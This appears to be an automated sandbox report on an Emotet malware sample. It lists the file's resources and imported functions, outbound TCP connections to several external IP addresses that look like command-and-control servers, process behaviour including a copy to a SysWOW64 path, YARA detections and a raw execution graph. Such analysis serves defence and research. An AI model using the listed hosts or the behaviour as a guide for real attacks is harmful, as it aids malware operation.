                RT_CURSOR0x6a9d80xb4dataEnglishUnited States
                RT_CURSOR0x6aa8c0x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6abc00xb4dataEnglishUnited States
                RT_CURSOR0x6ac740x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6ada80xb4dataEnglishUnited States
                RT_CURSOR0x6ae5c0x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6af900xb4dataEnglishUnited States
                RT_CURSOR0x6b0440x200AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6b2440xb4dataEnglishUnited States
                RT_CURSOR0x6b2f80x200AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6b4f80xb4dataEnglishUnited States
                RT_CURSOR0x6b5ac0x200AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6b7ac0xb4dataEnglishUnited States
                RT_CURSOR0x6b8600x200AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6ba600xb4dataEnglishUnited States
                RT_CURSOR0x6bb140x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6bc480xb4dataEnglishUnited States
                RT_CURSOR0x6bcfc0x134dataEnglishUnited States
                RT_CURSOR0x6be300xb4dataEnglishUnited States
                RT_CURSOR0x6bee40x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6c0180x134dataEnglishUnited States
                RT_CURSOR0x6c14c0x134dataEnglishUnited States
                RT_CURSOR0x6c2800x134dataEnglishUnited States
                RT_CURSOR0x6c3b40x134dataEnglishUnited States
                RT_CURSOR0x6c4e80x134dataEnglishUnited States
                RT_CURSOR0x6c61c0x134dataEnglishUnited States
                RT_CURSOR0x6c7500x134dataEnglishUnited States
                RT_CURSOR0x6c8840x134dataEnglishUnited States
                RT_CURSOR0x6c9b80x134dataEnglishUnited States
                RT_CURSOR0x6caec0x134AmigaOS bitmap fontEnglishUnited States
                RT_CURSOR0x6cc200x134dataEnglishUnited States
                RT_CURSOR0x6cd540x134dataEnglishUnited States
                RT_CURSOR0x6ce880x134dataEnglishUnited States
                RT_CURSOR0x6cfbc0x134dataEnglishUnited States
                RT_CURSOR0x6d0f00xb4dataEnglishUnited States
                RT_BITMAP0x6d1a40x4a0dataEnglishUnited States
                RT_BITMAP0x6d6440xb8dataEnglishUnited States
                RT_BITMAP0x6d6fc0x144dataEnglishUnited States
                RT_ICON0x6d8400x2e8data
                RT_MENU0x6db280x12cdataEnglishUnited States
                RT_MENU0x6dc540x3acdataEnglishUnited States
                RT_DIALOG0x6e0000x184dataEnglishUnited States
                RT_DIALOG0x6e1840x164dataEnglishUnited States
                RT_DIALOG0x6e2e80xf2dataEnglishUnited States
                RT_DIALOG0x6e3dc0xdcdataEnglishUnited States
                RT_DIALOG0x6e4b80xe8dataEnglishUnited States
                RT_DIALOG0x6e5a00x1a2dataEnglishUnited States
                RT_DIALOG0x6e7440x15adataEnglishUnited States
                RT_DIALOG0x6e8a00x34dataEnglishUnited States
                RT_STRING0x6e8d40x10edataEnglishUnited States
                RT_STRING0x6e9e40x204dataEnglishUnited States
                RT_STRING0x6ebe80x60dataEnglishUnited States
                RT_STRING0x6ec480x34dataEnglishUnited States
                RT_STRING0x6ec7c0x34dataEnglishUnited States
                RT_STRING0x6ecb00x358dataEnglishUnited States
                RT_STRING0x6f0080x3adataEnglishUnited States
                RT_STRING0x6f0440x208dataEnglishUnited States
                RT_STRING0x6f24c0xb0dataEnglishUnited States
                RT_STRING0x6f2fc0x298dataEnglishUnited States
                RT_STRING0x6f5940x1eadataEnglishUnited States
                RT_STRING0x6f7800xf0dataEnglishUnited States
                RT_STRING0x6f8700xaadataEnglishUnited States
                RT_STRING0x6f91c0x46dataEnglishUnited States
                RT_STRING0x6f9640x86dataEnglishUnited States
                RT_STRING0x6f9ec0x1f8dataEnglishUnited States
                RT_STRING0x6fbe40xaedataEnglishUnited States
                RT_STRING0x6fc940xb2dataEnglishUnited States
                RT_STRING0x6fd480x2adataEnglishUnited States
                RT_STRING0x6fd740x184dataEnglishUnited States
                RT_STRING0x6fef80x124dataEnglishUnited States
                RT_STRING0x7001c0x4adataEnglishUnited States
                RT_STRING0x700680x4e6dataEnglishUnited States
                RT_STRING0x705500x264dataEnglishUnited States
                RT_STRING0x707b40x2dadataEnglishUnited States
                RT_STRING0x70a900x8adataEnglishUnited States
                RT_STRING0x70b1c0x19adataEnglishUnited States
                RT_STRING0x70cb80xdedataEnglishUnited States
                RT_STRING0x70d980x4a8dataEnglishUnited States
                RT_STRING0x712400x228dataEnglishUnited States
                RT_STRING0x714680x2cdataEnglishUnited States
                RT_STRING0x714940x42dataEnglishUnited States
                RT_ACCELERATOR0x714d80x78dataEnglishUnited States
                RT_ACCELERATOR0x715500x18dataEnglishUnited States
                RT_RCDATA0x715680xf944data
                RT_GROUP_CURSOR0x80eac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80ed00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80ef40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80f180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80f3c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80f600x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80f840x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80fa80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80fcc0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x80ff00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x810140x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x810380x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                RT_GROUP_CURSOR0x8105c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x810fc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x811100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x811240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x811380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x8114c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_CURSOR0x811600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                RT_GROUP_ICON0x811740x14data
                RT_MANIFEST0x811880x15aASCII text, with CRLF line terminatorsEnglishUnited States

                Imports

                DLLImport
                KERNEL32.dllGetACP, IsValidCodePage, LCMapStringW, VirtualFree, HeapCreate, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, IsDebuggerPresent, GetConsoleCP, GetConsoleMode, LCMapStringA, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetEvent, TerminateProcess, HeapSize, CreateThread, ExitThread, ExitProcess, HeapReAlloc, VirtualAlloc, HeapFree, GetStartupInfoA, GetCommandLineA, HeapAlloc, RaiseException, RtlUnwind, GetTickCount, SetErrorMode, GetFileSizeEx, LocalFileTimeToFileTime, FileTimeToLocalFileTime, CreateFileA, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, lstrcmpiA, GetStringTypeExA, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, SystemTimeToFileTime, FileTimeToSystemTime, GetThreadLocale, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GetModuleHandleW, GlobalFlags, InterlockedDecrement, GetModuleFileNameW, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, SuspendThread, ResumeThread, SetThreadPriority, CloseHandle, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GetCurrentThreadId, GlobalFindAtomA, GlobalDeleteAtom, FreeLibrary, CompareStringA, lstrcmpW, GetVersionExA, GetCurrentProcessId, GlobalGetAtomNameA, GlobalAddAtomA, GetProcAddress, GetModuleHandleA, LoadLibraryA, FreeResource, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MultiByteToWideChar, MulDiv, lstrlenA, GetLastError, SetLastError, Sleep, GetExitCodeThread, CreateEventA, WideCharToMultiByte, FindResourceA, LoadResource, LockResource, SizeofResource, GetVersion, WaitForSingleObject, ResetEvent, GetTimeZoneInformation
                USER32.dllRegisterClipboardFormatA, GetDCEx, EndPaint, BeginPaint, GetWindowDC, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, WindowFromPoint, GetSysColorBrush, GetMenuItemInfoA, InflateRect, DestroyCursor, SetRect, LoadCursorA, SetCapture, KillTimer, SetTimer, ClientToScreen, SetWindowRgn, DrawIcon, FillRect, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, ShowOwnedPopups, GetMessageA, TranslateMessage, GetCursorPos, ValidateRect, PostQuitMessage, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, CheckMenuItem, RegisterWindowMessageA, SendDlgItemMessageA, IsChild, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, GetPropA, RemovePropA, GetFocus, GetWindowTextA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, MessageBoxA, GetClassInfoExA, RegisterClassA, ScreenToClient, DeferWindowPos, GetScrollInfo, SetScrollInfo, DefWindowProcA, CallWindowProcA, SystemParametersInfoA, GetWindowPlacement, IsZoomed, GetClassNameA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, WinHelpA, SetFocus, GetWindowThreadProcessId, IsWindowEnabled, EqualRect, GetDlgItem, GetDlgCtrlID, GetKeyState, LoadIconA, SetCursor, PeekMessageA, GetCapture, ReleaseCapture, LoadAcceleratorsA, SetActiveWindow, IsWindowVisible, IsIconic, InsertMenuItemA, CreatePopupMenu, GetClassInfoA, IntersectRect, OffsetRect, CopyRect, GetLastActivePopup, SetMenu, GetDesktopWindow, GetWindow, ShowWindow, GetSysColor, InvalidateRect, UnregisterClassA, GetTabbedTextExtentA, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, CharUpperA, DestroyIcon, GetWindowTextLengthA, LockWindowUpdate, GetWindowRect, SetRectEmpty, PtInRect, GetDC, GetSystemMetrics, ReleaseDC, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, RemoveMenu, AdjustWindowRectEx, RedrawWindow, SetWindowPos, GetClientRect, GetWindowLongA, SetWindowLongA, IsWindow, TranslateAcceleratorA, TranslateMDISysAccel, BringWindowToTop, GetActiveWindow, DrawMenuBar, CreateWindowExA, GetParent, GetMenuItemCount, GetSubMenu, GetMenuItemID, DefMDIChildProcA, GetMenu, DefFrameProcA, SendMessageA, LoadStringW, EnableWindow, UpdateWindow, PostMessageA, DispatchMessageA
                GDI32.dllSelectClipRgn, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, SetPolyFillMode, TextOutA, Escape, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreatePatternBrush, CreateSolidBrush, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetBkMode, RestoreDC, SaveDC, GetBkColor, ExtTextOutA, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, GetDeviceCaps, BitBlt, CreateFontIndirectA, GetStockObject, PatBlt, Rectangle, GetViewportOrgEx, CreatePen, EndDoc, AbortDoc, SetAbortProc, EndPage, StartPage, StartDocA, Ellipse, LPtoDP, DPtoLP, CreateEllipticRgn, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, GetTextExtentPoint32A, GetTextMetricsA, CreateCompatibleBitmap, CreateCompatibleDC, StretchDIBits, DeleteDC, GetObjectA, CreateFontA, SelectObject, GetCharWidthA, DeleteObject, CreateDCA, SetROP2
                COMDLG32.dllGetFileTitleA
                WINSPOOL.DRVClosePrinter, OpenPrinterA, GetJobA, DocumentPropertiesA
                ADVAPI32.dllRegSetValueExA, RegCreateKeyA, RegCreateKeyExA, GetFileSecurityA, SetFileSecurityA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegSetValueA, RegCloseKey, RegDeleteValueA
                SHELL32.dllDragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
                SHLWAPI.dllPathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
                ole32.dllOleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CoCreateInstance, CoTaskMemFree
                OLEAUT32.dllSysAllocStringLen, VariantChangeType, VariantClear, VariantInit

                Exports

                NameOrdinalAddress
                Run10x4037c0

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Mar 26, 2021 13:32:21.149575949 CET49726443192.168.2.4190.117.206.153
                Mar 26, 2021 13:32:24.137447119 CET49726443192.168.2.4190.117.206.153
                Mar 26, 2021 13:32:30.138016939 CET49726443192.168.2.4190.117.206.153
                Mar 26, 2021 13:32:46.299501896 CET49738443192.168.2.4203.99.187.137
                Mar 26, 2021 13:32:46.539707899 CET44349738203.99.187.137192.168.2.4
                Mar 26, 2021 13:32:47.045715094 CET49738443192.168.2.4203.99.187.137
                Mar 26, 2021 13:32:47.283056974 CET44349738203.99.187.137192.168.2.4
                Mar 26, 2021 13:32:47.795870066 CET49738443192.168.2.4203.99.187.137
                Mar 26, 2021 13:32:48.117441893 CET44349738203.99.187.137192.168.2.4
                Mar 26, 2021 13:32:52.279159069 CET4973920192.168.2.4200.55.168.82
                Mar 26, 2021 13:32:55.280688047 CET4973920192.168.2.4200.55.168.82
                Mar 26, 2021 13:33:01.296782970 CET4973920192.168.2.4200.55.168.82
                Mar 26, 2021 13:33:18.696319103 CET497478080192.168.2.470.32.94.58
                Mar 26, 2021 13:33:18.809274912 CET80804974770.32.94.58192.168.2.4
                Mar 26, 2021 13:33:19.314100027 CET497478080192.168.2.470.32.94.58
                Mar 26, 2021 13:33:19.425592899 CET80804974770.32.94.58192.168.2.4
                Mar 26, 2021 13:33:19.939344883 CET497478080192.168.2.470.32.94.58
                Mar 26, 2021 13:33:20.051001072 CET80804974770.32.94.58192.168.2.4
                Mar 26, 2021 13:33:23.146354914 CET497488080192.168.2.4213.138.100.98
                Mar 26, 2021 13:33:23.184562922 CET808049748213.138.100.98192.168.2.4
                Mar 26, 2021 13:33:23.689268112 CET497488080192.168.2.4213.138.100.98
                Mar 26, 2021 13:33:23.727399111 CET808049748213.138.100.98192.168.2.4
                Mar 26, 2021 13:33:24.236388922 CET497488080192.168.2.4213.138.100.98
                Mar 26, 2021 13:33:24.274235964 CET808049748213.138.100.98192.168.2.4
                Mar 26, 2021 13:33:28.601304054 CET497518080192.168.2.4144.76.62.10
                Mar 26, 2021 13:33:28.625920057 CET808049751144.76.62.10192.168.2.4
                Mar 26, 2021 13:33:29.127257109 CET497518080192.168.2.4144.76.62.10
                Mar 26, 2021 13:33:29.152199984 CET808049751144.76.62.10192.168.2.4
                Mar 26, 2021 13:33:29.658544064 CET497518080192.168.2.4144.76.62.10
                Mar 26, 2021 13:33:29.680944920 CET808049751144.76.62.10192.168.2.4
                Mar 26, 2021 13:33:33.485486031 CET49752990192.168.2.4203.99.188.203
                Mar 26, 2021 13:33:33.705632925 CET99049752203.99.188.203192.168.2.4
                Mar 26, 2021 13:33:34.221575022 CET49752990192.168.2.4203.99.188.203
                Mar 26, 2021 13:33:34.439589024 CET99049752203.99.188.203192.168.2.4
                Mar 26, 2021 13:33:34.940423965 CET49752990192.168.2.4203.99.188.203
                Mar 26, 2021 13:33:35.159921885 CET99049752203.99.188.203192.168.2.4
                Mar 26, 2021 13:33:38.379935980 CET49753990192.168.2.4201.196.15.79
                Mar 26, 2021 13:33:41.378377914 CET49753990192.168.2.4201.196.15.79
                Mar 26, 2021 13:33:47.378798962 CET49753990192.168.2.4201.196.15.79

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: YF4dF4w2Cr.exe PID: 6836 Parent PID: 5912

                General

                Start time:13:31:52
                Start date:26/03/2021
                Path:C:\Users\user\Desktop\YF4dF4w2Cr.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\YF4dF4w2Cr.exe'
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                Chronological Activities

                Analysis Process: YF4dF4w2Cr.exe PID: 6856 Parent PID: 6836

                General

                Start time:13:31:52
                Start date:26/03/2021
                Path:C:\Users\user\Desktop\YF4dF4w2Cr.exe
                Wow64 process (32bit):true
                Commandline:--5c8d8ab7
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                Chronological Activities

                Analysis Process: fwdrrebrand.exe PID: 6912 Parent PID: 568

                General

                Start time:13:31:57
                Start date:26/03/2021
                Path:C:\Windows\SysWOW64\fwdrrebrand.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\fwdrrebrand.exe
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                Chronological Activities

                Analysis Process: fwdrrebrand.exe PID: 6928 Parent PID: 6912

                General

                Start time:13:31:58
                Start date:26/03/2021
                Path:C:\Windows\SysWOW64\fwdrrebrand.exe
                Wow64 process (32bit):true
                Commandline:--1cbc15eb
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                Chronological Activities

                Disassembly

                Code Analysis

                Reset < >

                  Analysis Process: YF4dF4w2Cr.exe PID: 6836 Parent PID: 5912 YF4dF4w2Cr.exeCOMMON

                  Execution Graph

                  Execution Coverage:6.3%
                  Dynamic/Decrypted Code Coverage:3.3%
                  Signature Coverage:7.3%
                  Total number of Nodes:1569
                  Total number of Limit Nodes:35

                  Graph

                  execution_graph 42284 4016f0 GetVersion 42285 401724 GetVersion 42284->42285 42286 40174a 42284->42286 42285->42286 42287 40172a 42285->42287 42317 414cc5 42286->42317 42358 417146 133 API calls 3 library calls 42287->42358 42290 401753 42327 404461 42290->42327 42291 401735 42294 40178b 42331 416787 42294->42331 42297 40179e 42298 404461 std::ios_base::_Init 69 API calls 42297->42298 42299 4017a8 42298->42299 42300 4017c2 42299->42300 42360 401380 113 API calls 42299->42360 42335 40451b 42300->42335 42304 4017f8 42354 4165c6 42304->42354 42306 401801 42307 41576c 82 API calls 42306->42307 42308 40180a 42307->42308 42309 416609 252 API calls 42308->42309 42310 40182a 42309->42310 42311 401850 DragAcceptFiles 42310->42311 42312 40182e ctype 42310->42312 42313 412c34 ctype ShowWindow 42311->42313 42314 40186a UpdateWindow 42313->42314 42315 401881 ctype 42314->42315 42318 414cd1 __EH_prolog3 42317->42318 42319 414d2b 42318->42319 42322 404461 std::ios_base::_Init 69 API calls 42318->42322 42371 426574 42319->42371 42321 414d3d std::_Locinfo::~_Locinfo 42321->42290 42323 414cf4 42322->42323 42324 414d16 42323->42324 42378 426ddd 83 API calls 5 library calls 42323->42378 42361 426d44 42324->42361 42329 404469 42327->42329 42328 43108c _malloc 69 API calls 42328->42329 42329->42328 42330 40175d 42329->42330 42330->42294 42359 4172aa 126 API calls 2 library calls 42330->42359 42332 416793 __EH_prolog3 42331->42332 42333 404461 std::ios_base::_Init 69 API calls 42332->42333 42334 4167a2 std::_Locinfo::~_Locinfo 42332->42334 42333->42334 42334->42297 42610 40acdf 42335->42610 42337 404534 42338 4017e6 42337->42338 42339 404538 GetMenu 42337->42339 42338->42291 42340 416a7e 42338->42340 42339->42338 42341 416a8a __EH_prolog3 42340->42341 42342 4014c0 ctype 82 API calls 42341->42342 42353 416b1f ctype std::_Locinfo::~_Locinfo 42341->42353 42343 416ab0 42342->42343 42344 41f363 ctype 112 API calls 42343->42344 42345 416ab8 42344->42345 43539 4292e7 GetModuleFileNameA 42345->43539 42348 406039 118 API calls 42349 416ad7 42348->42349 42350 416ae3 PathRemoveExtensionA 42349->42350 42351 40a356 82 API calls 42350->42351 42352 416af4 GlobalAddAtomA GlobalAddAtomA 42351->42352 42352->42353 42353->42304 42355 4165d1 42354->42355 42356 4165d6 42354->42356 43552 406436 2 API calls 4 library calls 42355->43552 42358->42291 42359->42294 42360->42300 42362 426d50 __EH_prolog3 42361->42362 42363 404461 std::ios_base::_Init 69 API calls 42362->42363 42364 426d64 42363->42364 42379 41f363 42364->42379 42366 426d6d ctype 42368 426dce ctype std::_Locinfo::~_Locinfo 42366->42368 42384 431ba5 42366->42384 42387 426700 42366->42387 42410 4057d4 82 API calls 42366->42410 42368->42319 42372 426582 42371->42372 42373 4265c8 GetPrivateProfileIntA 42371->42373 42609 42652c 7 API calls 42372->42609 42375 426590 42373->42375 42375->42321 42376 42658a 42376->42375 42377 426595 RegQueryValueExA RegCloseKey 42376->42377 42377->42375 42378->42324 42411 420aec 42379->42411 42381 41f372 42382 41f395 42381->42382 42422 4205c8 8 API calls 3 library calls 42381->42422 42382->42366 42465 43081b 42384->42465 42388 42671d __ftelli64_nolock 42387->42388 42389 426841 GetPrivateProfileStringA 42388->42389 42390 42675d 42388->42390 42393 42676d 42389->42393 42486 42652c 7 API calls 42390->42486 42395 406039 118 API calls 42393->42395 42394 426763 42394->42393 42396 426778 42394->42396 42397 42681e ctype 42395->42397 42487 4014c0 42396->42487 42506 430650 42397->42506 42400 4267f8 RegCloseKey 42403 426812 42400->42403 42404 426834 42400->42404 42402 4267bb 42406 4267cc RegQueryValueExA 42402->42406 42495 405562 42403->42495 42498 406039 42404->42498 42405 426894 42405->42366 42491 40a356 42406->42491 42410->42366 42413 420af8 __EH_prolog3 42411->42413 42414 420b46 42413->42414 42423 420802 TlsAlloc 42413->42423 42427 4206ea EnterCriticalSection 42413->42427 42449 406436 2 API calls 4 library calls 42413->42449 42442 42055c EnterCriticalSection 42414->42442 42419 420b59 42450 4208a9 90 API calls 5 library calls 42419->42450 42420 420b6c std::_Locinfo::~_Locinfo 42420->42381 42422->42381 42424 420833 InitializeCriticalSection 42423->42424 42425 42082e 42423->42425 42424->42413 42451 4063fe RaiseException __CxxThrowException@8 42425->42451 42429 42070d 42427->42429 42428 4207cc _memset 42430 4207e3 LeaveCriticalSection 42428->42430 42429->42428 42431 420746 42429->42431 42432 42075b GlobalHandle GlobalUnlock 42429->42432 42430->42413 42452 4148c1 42431->42452 42434 4148c1 ctype 82 API calls 42432->42434 42436 420779 GlobalReAlloc 42434->42436 42437 420785 42436->42437 42438 4207ac GlobalLock 42437->42438 42439 420790 GlobalHandle GlobalLock 42437->42439 42440 42079e LeaveCriticalSection 42437->42440 42438->42428 42439->42440 42456 4063fe RaiseException __CxxThrowException@8 42440->42456 42443 420577 42442->42443 42444 42059e LeaveCriticalSection 42442->42444 42443->42444 42445 42057c TlsGetValue 42443->42445 42446 4205a7 42444->42446 42445->42444 42447 420588 42445->42447 42446->42419 42446->42420 42447->42444 42448 42058d LeaveCriticalSection 42447->42448 42448->42446 42449->42413 42450->42420 42453 4148d6 ctype 42452->42453 42454 4148e3 GlobalAlloc 42453->42454 42457 401090 42453->42457 42454->42437 42458 4010a0 42457->42458 42459 40109b 42457->42459 42464 405ad1 82 API calls 4 library calls 42458->42464 42463 4063fe RaiseException __CxxThrowException@8 42459->42463 42462 4010a6 42464->42462 42466 430845 42465->42466 42467 430828 42465->42467 42469 430852 42466->42469 42471 43085f 42466->42471 42480 431d3e 69 API calls __getptd_noexit 42467->42480 42482 431d3e 69 API calls __getptd_noexit 42469->42482 42470 43082d 42481 4367e9 7 API calls 2 library calls 42470->42481 42483 43074f 103 API calls 2 library calls 42471->42483 42475 430876 42477 43083d 42475->42477 42484 431d3e 69 API calls __getptd_noexit 42475->42484 42477->42366 42479 430857 42485 4367e9 7 API calls 2 library calls 42479->42485 42480->42470 42482->42479 42483->42475 